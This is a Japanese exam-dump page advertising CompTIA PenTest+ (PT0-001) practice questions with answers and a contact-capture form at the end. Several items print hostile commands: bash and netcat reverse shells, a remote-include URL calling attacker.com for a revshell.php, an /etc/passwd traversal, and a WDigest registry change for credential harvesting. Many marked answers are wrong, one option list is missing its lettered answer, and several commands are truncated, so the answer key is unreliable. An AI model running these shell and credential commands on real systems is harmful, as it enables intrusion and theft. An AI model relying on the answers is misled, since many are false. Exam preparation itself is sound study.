すべての情報を見逃したくないですか?

認定試験に合格するためのヒント

最新の試験ニュースと割引情報

当社の専門家による厳選最新情報

はい、ニュースを送ってください

CompTIA PT0-001試験問題集2024年更新:CompTIA PenTest+認定試験対策問題集|SPOTO

弊社の2024年更新のCompTIA PT0-001試験問題集を利用してCompTIA PenTest+(PT0-001)資格を準備しましょう。試験の準備をする最もよい方法は最新の試験問題集を使って練習することです。弊社の練習問題集は様々なトピックとシナリオをカバーしており、従来のデスクトップやサーバーだけでなく、クラウドやモバイルプラットフォームなどの新しい環境での実践的なテストも含んでいます。弊社の試験問題、サンプル問題、試験ダンプを活用することで、成功に必要な知識と自信を得ることができます。当社の模擬試験と試験シミュレータは、あなたの準備をさらに強化するために、現実的な試験体験を提供します。弊社の試験問題集を利用し、PT0-001試験への準備を完璧にし、CompTIA PenTest+認定資格を楽に取得しましょう。
他のオンライン試験を受ける

質問 #1
ある侵入テスト実施者が、ウェブアプリケーションの脆弱性スキャンレポートをクライアントに提出します。侵入テスト実施者は、ある脆弱性を中程度の重大度と評価します。同じ脆弱性が、前回のレポートでは重大度「クリティカル」として報告されました。深刻度が下がった理由として最も可能性が高いのは次のうちどれですか?
A. バージョンを更新せずにホットフィックスを適用してしまった。
B. 脅威の状況は大きく変化している。
C. クライアントがコードベースに新機能を追加した。
D. 現在のところ、この脆弱性に対する悪用は知られていない。
回答を見る
正解: A
質問 #2
ある侵入テスト実施者が、脆弱性スキャンを実施する前に、いくつかのリモートホストについて初期情報収集を行っている。このテスト者は、次のコマンドを実行します。 nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 複数のIPアドレスが指定される理由を最も適切に説明しているのはどれですか?
A. ネットワークはa/25以上のサブネットになっており、テスターは2つの異なるサブネット上のホストにアクセスする必要があった。
B. テスターは、いくつかの偽のアドレスを含めることで、よりステルス性の高いスキャンを実行しようとしている。
C. スキャンマシンには、指定された速度でスキャン要求をバランスさせるための複数のインターフェイスがある。
D. ディスカバリスキャンが最初のアドレスセットに対して実行されるのに対し、後者のホストに対しては、より深く、より攻撃的なスキャンが実行される。
回答を見る
正解: A
質問 #3
ある侵入テスト実施者が、外部脆弱性スキャン中に次のような発見をしました: 上記のスキャン結果から優先すべき攻撃戦略はどれか。
A. 旧式のソフトウェアには、悪用可能なコンポーネントが含まれている可能性があります。
B. 脆弱なパスワード管理が行われている可能性がある。
C. 暗号的に弱いプロトコルは傍受される可能性がある。
D. ウェブサーバの設定は、機密情報を明らかにする可能性がある。
回答を見る
正解: D
質問 #4
ある会社が、外部IPが100.170.60.5である新しいVPNコンセントレータのインストールに脆弱性があるかどうかを調べるために、ペネトレーションテスターを雇います。VPNが利用可能かどうかをテストするコマンドはどれか。
A. fpipe
B. ike-scan -A -t 1 --sourceip=apoof_ip 100
C. nmap -sS -A -f 100
D. nc 100
回答を見る
正解: B
質問 #5
ある侵入テスト実施者が、あるアプリケーションがインターネットに面したアプリケーションで基本認証しか利用していないと報告しました。次のうち、最も適切な改善策はどれか。
A. HTTP Strict Transport Securityを有効にする。
B. 安全なクッキーフラグを有効にする。
C. 通信路を暗号化する。
D. 無効なユーザー入力をサニタイズする。
回答を見る
正解: A
質問 #6
最高経営責任者(CEO)から最高財務責任者(CFO)に送られた電子メールに、新しいベンダーへの支払いに電信送金が必要であると書かれていた。どちらもそのベンダーのことは知らず、CEO は電子メールの送信を否定しています。この攻撃で使用された動機は次のうちどれですか?
A. 恐怖の原理
B. 権威の原則
C. 希少性の原理
D. 類似性の原則
E. 社会的証明の原則
回答を見る
正解: B
質問 #7
あるセキュリティ評価者が、ある会社とそのネットワークおよびシステムの包括的な侵入テストを実施した。評価中に、このテスト実施者は、この会社のイントラネット全体の給与計算ウェブ・アプリケーションで TLS に使用されている暗号ライブラリの脆弱性を特定した。しかし、この脆弱性はベンダーによってまだパッチが適用されていません。次の戦略のうち、影響リスクを軽減するのに最適なものはどれか。
A. Webサーバーの暗号化設定を変更し、暗号化、ハッシュ化、およびデジタル署名に、より強力な暗号スイート(cipher-suite)を使用する。
B. アプリケーションにアクセスする際のリスクを認識するための新しいトレーニングを実施する。このトレーニングは、脆弱性にパッチが適用された後に廃止することができる。
C. ACL を実装して、アプリケーションへのアクセスを財務部門のみに制限する。脆弱性のパッチが適用された後、アプリケーションを社内スタッフに再開する。
D. 給与支払ユーザに対し、アプリケーションの認証に使用するパスワードの変更を要求する。脆弱性のパッチ適用後、パスワードの変更を再度要求する。
回答を見る
正解: C
質問 #8
ある侵入テスト実施者が、ある企業の外部侵入評価を実施することになりました。次のステップのうち、受動的情報収集プロセスに最も役立つのはどれですか。(2つ選んでください)。
A. 会社の建物の外で待機し、従業員の後ろから尾行を試みる。
B. 会社の外部ネットブロックに対して脆弱性スキャンを実行し、悪用可能な脆弱性を特定し、アクセスを試みる。
C. ドメインとIPレジストリのウェブサイトを使用して、会社の外部ネットブロックと外部向けアプリケーションを特定する。
D. ソーシャルメディアを検索して、自分が扱っている技術に関する情報を投稿している情報技術社員を探す。
E. 会社の社外向けウェブメール・アプリケーションを特定し、ユーザー・アカウントを列挙し、パスワードを推測してアクセスを試みる。
回答を見る
正解: DE
質問 #9
次のスクリプトがあるとする:このスクリプトの目的を最もよく表しているのは、次のうちどれですか?
A. ログ収集
B. イベント収集
C. キーストローク監視
D. デバッグメッセージの収集
回答を見る
正解: C
質問 #10
限られた権限のWindowsシステムで永続性を維持しようとするとき、テスト担当者は次のレジストリキーのどれを使うべきか。
A. hkey_classes_root
B. hkey_local_machine
C. hkey_current_user
D. hkey_current_config
回答を見る
正解: C
質問 #11
あるソフトウェア開発者が、アプリケーションのコードに脆弱性がないかテストしたいと考えています。ソフトウェア開発者が実行すべきプロセスは次のうちどれですか?
A. 脆弱性スキャン
B. ダイナミック・スキャン
C. 静的スキャン
D. コンプライアンス・スキャン
回答を見る
正解: A
質問 #12
ウェブアプリケーションの評価中に、侵入テスト者はサーバ上で任意のコマンドが実行できることを発見しました。この攻撃をさらに一歩進めたいと考え、侵入テスト者は 192.168.1.5 にある攻撃マシンに戻るリバースシェルを得る方法を探り始めます。次のうち、可能な方法はどれか。(2つ選んでください)。
A. nc 192
B. nc -nlvp 44444 -e /bin/sh
C. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
D. nc -e /bin/sh 192
E. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
F. rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192
回答を見る
正解: BC
質問 #13
http://example.com/download.php?id-.../.../.../etc/passwd 上記の攻撃を最もよく表しているのはどれか?
A. 悪意のあるファイルアップロード攻撃
B. リダイレクト攻撃
C. ディレクトリトラバーサル攻撃
D. 安全でない直接目的語参照攻撃
回答を見る
正解: C
質問 #14
ある会社が、基幹業務アプリケーションのセキュリティを評価するために、侵入テストを専門とする会社と契約した。その会社は Java バイトコードのコピーを提供した。静的コードアナライザを実行する前に、その会社が取らなければならない手順はどれか。
A. アプリケーションをダイナミックコードアナライザで実行する。
B. ファジングユーティリティを使用する。
C. アプリケーションをデコンパイルする。
D. メモリ割り当てを確認してください。
回答を見る
正解: D
質問 #15
あるセキュリティアナリストがWAFのログを監視しているときに、次のURLに対する攻撃が成功しているのを発見した。https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.php このタイプの攻撃を防ぐために、次のうちどの修復措置をとるべきか。
A. ブラックリストを導入する。
B. URLリダイレクトをブロックする。
C. パラメータを二重URLエンコードする。
D. アプリケーションからの外部呼び出しを停止する。
回答を見る
正解: B
質問 #16
ある会社が、侵入テスト実施者に、社内で開発されたアンドロイド・アプリケーションのセキュリ ティのレビューを依頼した。侵入テスト者は、評価をサポートするために APK ファイルを受け取った。侵入テスト者は、APK ファイルに対して SAST を実行したい。侵入テスト実施者は、次の準備手順のうちどれを最初に行う必要がありますか?(2つ選択してください)。
A. JARに変換する。
B. デコンパイルする。
C. アプリケーションをクロスコンパイルする。
D. JARファイルをDEXに変換する。
E. APKに再署名する。
F. ADBに取り付ける。
回答を見る
正解: AB
質問 #17
最近行われた侵入テストで、あるレガシー・ウェブ・アプリケーションがSQLインジェクションに対して脆弱であることが明らかになった。調査によると、脆弱性を完全に修正するにはアーキテクチャの変更が必要であり、利害関係者はアプリケーションの可用性を危険にさらす立場にありません。このような状況下で、SQL インジェクションのリスクを最小化するための、労力の少ない短期的な解決策はどれですか?(2つ選んでください)
A. コードからインライン SQL ステートメントを特定し、削除する。
B. ストアドプロシージャから動的SQLを特定し、削除する。
C. すべてのユーザー入力を特定し、サニタイズする。
D. SQL文のホワイトリスト・アプローチを使用する。
E. SQL文にブラックリスト・アプローチを使用する。
F. 悪意のある入力元を特定し、IPアドレスをブロックする。
回答を見る
正解: CD
質問 #18
テスト中に、クライアントのコアサーバーに重大な脆弱性が発見された。次のうち、次のアクションはどれですか?
A. 影響を受けるサービスのネットワークポートを無効にする。
B. すべての調査結果をまとめ、クライアントに提出する。
C. 発見の詳細を速やかにクライアントに警告する。
D. 攻撃者に悪用されないように、ターゲットをオフラインにする。
回答を見る
正解: A
質問 #19
Metasploitで侵入テスト者がインターネットからプライベートネットワークにアクセスできるようにするコマンドはどれか。
A. rhost 192
B. autoroute -s 192
C. db_nmap -iL /tmp/privatehosts
D. auxiliary/server/socks4a を使用する。
回答を見る
正解: A
質問 #20
ある会社が、ウェブアプリケーションの侵入テストを実施するためにコンサルタントを雇う計画を立て、予算を確保した。脆弱性が発見されると、会社はコンサルタントに以下のタスクを実行するよう依頼しました:コードレビュー ファイアウォール設定の更新 この状況で発生したことは、次のうちどれですか?
A. スコープクリープ
B. 死後レビュー
C. リスクの受容
D. 脅威の防止
回答を見る
正解: A
質問 #21
ある顧客が侵入テスト実施者に、新しいウェブアプリケーションの可用性を評価するよう依頼しています。テスターが使用すべき攻撃のタイプはどれですか?
A. TCP SYNフラッド
B. SQLインジェクション
C. XSS
D. XMASスキャン
回答を見る
正解: B
質問 #22
chmod 4111 /usr/bin/sudo Linuxのファイルシステム上で次のコマンドを実行する。
A. カーネルの脆弱性
B. スティッキー・ビット
C. 引用されていないサービスパス
D. sudo の設定ミス
回答を見る
正解: B
質問 #23
ある侵入テスト者は、1台のワークステーションを侵害した後、最小限の障害でドメイン全体を横方向に移動することができる。次の緩和策のうち、レポートで推奨するのが最も適切なものはどれか。(3つ選択)。
A. 各マシンのローカル管理者認証情報をランダムにする。
B. ローカル管理者のリモートログオンを無効にする。
C. すべてのログインに多要素認証を要求する。
D. パスワードの複雑さの最小要件を増やす。
E. 追加のネットワークアクセス制御を適用する。
F. すべてのワークステーションでフルディスク暗号化を有効にする。
G. 各ホストを独自のVLANにセグメント化する。
回答を見る
正解: CDE
質問 #24
ペネトレーション・テストを実施する際に、特定された発見を秘密にすることが重要である理由を説明する最も適切なものはどれか。
A. 侵入テストの結果には、企業の知的財産が含まれていることが多い。
B. ペネトレーションテストの結果が公表されれば、消費者の不満につながる可能性がある。
C. 侵入テスト結果は、特権情報を含む法的文書である。
D. ペネトレーションテストの結果は、攻撃者がシステムを侵害する際に役立つ可能性があります。
回答を見る
正解: D
質問 #25
ある侵入テスト実施者は、インフラ面を完了した後、ターゲット企業のスタッフに対して OSINT を実施する必要があります。次のうち、侵入のための最良のステップはどれか。
A. 会社に電話をかけ、ソーシャル・エンジニアリングのテクニックを使ってスタッフの情報を入手する。
B. クライアントを訪問し、スタッフから情報を得るためになりすます。
C. 職員になりすましたメールを送り、職員が機密情報を返信するかどうかを確認する。
D. SNSなど、スタッフの情報をインターネットで検索する。
回答を見る
正解: D
質問 #26
展示ボタンをクリックしてください。 Niktoの脆弱性、展示に示されているスキャン出力が与えられた場合、ターゲットシステムを悪用するために使用される可能性のある悪用技術は次のうちどれですか?(2つ選びなさい)
A. 任意のコード実行
B. セッションハイジャック
C. SQLインジェクション
D. ログイン・クレデンシャルのブルート・フォース
E. クロスサイト・リクエスト・フォージェリ
回答を見る
正解: BD
質問 #27
bash -i >& /dev/tcp/10.2.4.6/443 0> &1 前のコマンドを成功させるために、テスターのLinuxシステムで実行する必要がある追加コマンドはどれか。
A. nc -nlvp 443
B. nc 10
C. nc -w3 10
D. nc -e /bin/sh 10
回答を見る
正解: D
質問 #28
次のコマンドのどれがMetasploitデータベースを起動しますか?
A. msfconsole
B. ワークスペース
C. msfvenom
D. db_init
E. db_connect
回答を見る
正解: A
質問 #29
あるセキュリティコンサルタントが、以前に特定されたユーザアカウントでデバイスを攻撃しようとしています。実行されている攻撃は次のうちどれですか。
A. クレデンシャルダンプ攻撃
B. DLL インジェクション攻撃
C. 逆シェル攻撃
D. ハッシュ攻撃をパスする
回答を見る
正解: D
質問 #30
あるソフトウェア開発チームが最近、オンプレミス環境の新しいアプリケーション・ソフトウェアに移行した。侵入テストの結果、複数の脆弱性が存在することがわかった。ペネトレーションテスト実施者がライブ環境またはテスト環境にアクセスできない場合、VM上に同じ環境を作成してテストを実施する方がよいかもしれません。次のうち、確認のために最も重要なものはどれですか?
A. 安全でないサービスとプロトコル設定
B. SMBおよびSMTPサービスの実行
C. 脆弱なパスワードとユーザーアカウント
D. 設定ミス
回答を見る
正解: A
質問 #31
ブラックボックス侵入テスト戦略は、テスト実施者に以下を提供する:
A. ターゲットリスト
B. ネットワーク図
C. ソースコード
D. 特権クレデンシャル
回答を見る
正解: D
質問 #32
ある侵入テスト者がSSHのためにネットワークをスキャンしており、提供されたターゲットのリストを持っている。テスト者は次のNmapコマンドのどれを使うべきか?
A. nmap -p 22 -iL ターゲット
B. nmap -p 22 -sL ターゲット
C. nmap -p 22 -oG ターゲット
D. nmap -p 22 -oA ターゲット
回答を見る
正解: A
質問 #33
b117525b345470c29ca3d8ac0b556ba8セキュリティ・コンサルタントが次のようなパスワード・ハッシュに出くわした場合、正しいハッシュ・タイプはどれか?
A. ケルベロス
B. NetNTLMv1
C. NTLM
D. SHA-1
回答を見る
正解: D
質問 #34
あるウェブ・アプリケーションの侵入テストを行っているエンジニアが、ユーザ・ログイン・プロセスが HTTP GET メソッドを使ってフィールド・データから送信していることを発見した。機密情報漏洩のリスクを軽減するために、フォームの送信には HTTP GET メソッドを使うべきである:
A. HTTP POSTメソッド。
B. HTTP OPTIONSメソッド。
C. HTTP PUTメソッド。
D. HTTP TRACEメソッド。
回答を見る
正解: A
質問 #35
ある企業のセキュリティ・アセスメントを実施した後、クライアントのテスト環境が利用できなかった時間について、クライアントが請求を受けていたことが判明した。クライアントは、不当に請求されたと主張しています。このような状況において、指針を示すことができる可能性が最も高い文書は、次のうちどれでしょうか?
A. SOW
B. NDA
C. オイラドBPA
回答を見る
正解: D
質問 #36
婚約を計画する際に最も重要なのは次のうちどれですか?(2つ選んでください)。
A. 目標/目的
B. アーキテクチャ図
C. 衝撃に対する耐性
D. レポートの保存時間
E. 会社の方針
回答を見る
正解: AC
質問 #37
単純なバッファ・オーバーフローを悪用するために、ペネトレーション・テスターが上書きする必要があるCPUレジスタはどれか?
A. スタックポインタレジスタ
B. インデックス・ポインタ・レジスタ
C. スタックベースポインタ
D. デスティネーションインデックスレジスタ
回答を見る
正解: A
質問 #38
ある侵入テスト実施者が、危険な「python -c ' import pty;pty.spawn ("/bin/bash") '.テスターが取っている行動は次のうちどれですか?
A. Bash履歴の削除
B. シェルのアップグレード
C. サンドボックスの作成
D. クレデンシャルの取得
回答を見る
正解: B
質問 #39
侵入テスト者は、ドメインコントローラへのフルシェルを持っており、21日間にドメインに認証されていないユーザーアカウントを発見したい。次のコマンドのどれが最もよくこれを達成するか?
A. dsrm -users "DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
回答を見る
正解: D
質問 #40
侵入テスト担当者が、WPA2-PSKで保護されたワイヤレスネットワークを監視して、クライアントとアクセスポイント間のハンドシェイクをキャプチャしようとしている。テスターは、識別されたネットワークの正しいチャネルを監視していますが、ハンドシェイクをキャプチャすることに成功していません。このシナリオを考えると、テスト者がこのハンドシェイクを取得するのに役立つ攻撃は、次のうちどれがBESTでしょうか?
A. カルマ攻撃
B. 認証解除攻撃
C. フラグメンテーション攻撃
D. SSDIブロードキャストフラッド
回答を見る
正解: B
質問 #41
ある侵入テスト実施者が、あるコンピュータで次のようなNmapスキャンを実行した: nmap -aV 192.168.1.5 組織は、その環境からTelnetを無効にしていると言っていた。しかし、Nmapスキャンの結果は、ポート22が閉じており、ポート23がSSHに対して開いていることを示している。次のうち、何が起こったかを説明する最も適切なものはどれか。
A. 組織はTelnetを無効にすることに失敗した。
B. Nmapの結果には、ポート23に対する偽陽性が含まれている。
C. ポート22がフィルタリングされた。
D. サービスが標準以外のポートで実行されている。
回答を見る
正解: A
質問 #42
スピアフィッシング攻撃の例はどれか。
A. SMS攻撃で幹部を狙う
B. メール攻撃で特定のチームを狙う
C. USBキーで無作為のユーザーを狙う
D. 水飲み場攻撃で組織を狙う
回答を見る
正解: A
質問 #43
ある侵入テスト実施者が、あるシステムに「ゴースト」脆弱性が存在するかどうかを手動で確認したいと考えています。脆弱性を検証する方法として正しいものはどれか。
A. GHOSTファイルをLinuxシステムにダウンロードし、gcc -o GHOST test iをコンパイルする:
B. GHOSTファイルをWindowsシステムにダウンロードし、コンパイルする gcc -o GHOST GHOST
C. GHOSTファイルをLinuxシステムにダウンロードし、コンパイルする gcc -o GHOST
D. GHOSTファイルをWindowsシステムにダウンロードし、コンパイルする。
回答を見る
正解: C
質問 #44
ある侵入テスト実施者が、ウェブベースの銀行アプリケーションのブラックボックス評価を行っている。テスト者はログインページの URL だけを提供されました。以下のコードと出力が与えられています: テスト者は次のどれを実行するつもりですか?
A. 水平方向に権限を昇格させる。
B. 隠しフィールドがないかページをスクレイピングする。
C. HTTPレスポンスコードを分析する。
D. HTTP ヘッダを検索します。
回答を見る
正解: D
質問 #45
ターゲットの外部ドメインでパッシブ偵察を行うのに最も適しているのはどれか?
A. ピーチ
B. CeWL
C. OpenVAS
D. 初段
回答を見る
正解: D
質問 #46
侵入テスト中、テスト者はフィッシングキャンペーンを実行し、Windows 10 OSを実行している社内PCからシェルを受け取る。テスト者はMimikatzを使ってクレデンシャルハーベスティングを実行したいと考えています。次のレジストリの変更のうち、メモリにクレデンシャルをキャッシュできるようになるのはどれですか?
A. reg add HKLMSystem﹑ControlSet002﹑SecurityProviders﹑WDigest /v userLogoCredential /t REG_DWORD /d 0
B. reg add HKCUSystem㊤CurrentControlSet㊤SecurityProviders㊤WDigest /v userLogoCredential /t REG_DWORD /d 1
C. reg add HKLMSoftware﹑CurrentControlSet﹑Control﹑SecurityProviders﹑WDigest /v userLogoCredential /t REG_DWORD /d 1
D. reg add HKLMSystem㊤CurrentControlSet㊤SecurityProviders㊤WDigest /v userLogoCredential /t REG_DWORD /d 1
回答を見る
正解: A
質問 #47
侵入テストの冒頭で、テスト者は、電子メールアドレス、勤務先電話番号、コンピュータ名、オフィスの所在地などの従業員データを含むファイルを見つける。このファイルは公開 Web サーバでホストされています。この情報を取得するために使用されたテクニックを最もよく表しているのは、次のうちどれですか?
A. サービスの列挙
B. OSINTの収集
C. ポートスキャン
D. ソーシャル・エンジニアリング
回答を見る
正解: B

送信後に回答を表示する

質問の回答を得るには、電子メールと WhatsApp を送信してください。

注: 正しい試験結果を得ることができるように、電子メール ID と WhatsApp が有効であることを確認してください。

Eメール:
WhatsApp/電話番号: